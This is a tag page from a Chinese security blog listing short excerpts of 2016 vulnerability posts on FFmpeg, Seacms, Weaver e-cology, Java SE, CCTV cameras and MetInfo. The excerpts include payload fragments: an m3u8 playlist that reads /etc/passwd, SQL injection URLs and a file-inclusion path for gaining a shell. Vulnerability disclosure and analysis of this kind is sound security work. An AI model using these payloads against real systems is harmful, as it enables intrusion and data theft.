标签 漏洞 下的文章

FFmpeg文件读取漏洞测试及利用

from:安全脉搏经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。看了老外写的文章,大概理解的利用方式如下:#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd #EXT-X-E...

没穿底裤 2016 年 06 月 01 日 暂无评论

Seacmsv6.25 two sql inject

1.全局的ip获取做了正则,但是某个文件里的获取ip却重新写了,已经醉了 出现在注册那里reg.phpif ($HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"]) {     $ip = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"]; } elseif ($HTTP_SERVER_VARS["HTTP_CLIENT...

没穿底裤 2016 年 04 月 11 日 暂无评论

泛微e-cology v8直接获取数据的SQL注入漏洞

漏洞作者: rootsec详细说明:泛微e-cology oa系统/hrm/resource/HrmResourceContactEdit.jsp页面id参数存在sql注入漏洞,攻击者可以通过此漏洞提升当前用户权限、获取数据库内容等操作漏洞证明:http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?id=119%20and%20...

没穿底裤 2016 年 04 月 03 日 暂无评论

Oracle out-of-band release for Java SE Vulnerability

0)漏洞简介漏洞编号:CVE-2016-0636,此漏洞是安全研究员(Adam Gowdiak)于2013年报告给Oracle的漏洞(CVE-2013-5838)的变体。由于Oracle在部分代码分支中未对该漏洞进行修补,导致了此漏洞再现江湖,影响版本:java SE 7u97, 8u73, 8u74。1)测试环境Windows 7 x86 + jdk_1.8.0_742)漏洞分析由于反射A...

没穿底裤 2016 年 03 月 29 日 暂无评论

某CCTV摄像头漏洞分析

 作者:mickey今天看老外分析了一款廉价CCTV摄像头的文章,地址在https://www.pentestpartners.com/blog/pwning-cctv-cameras/,摄像头的amazon购买地址是http://www.amazon.co.uk/dp/B0162AQCO4,老外曝光的漏洞主要有四个,分别是默认密码,web登陆认证绕过,内建的webshell,以及...

没穿底裤 2016 年 02 月 18 日 3 条评论

MetInfo 5.1.7任意文件包含漏洞可getshell

漏洞作者: 路人甲getshell可以参考前人的feedback/uploadfile_save.php可以上传图片文件。 http://www.0891display.cn//index.php?index=a&skin=default/../&dataoptimize_html=/../../upload/file/1449564120.jpg 

没穿底裤 2016 年 02 月 17 日 暂无评论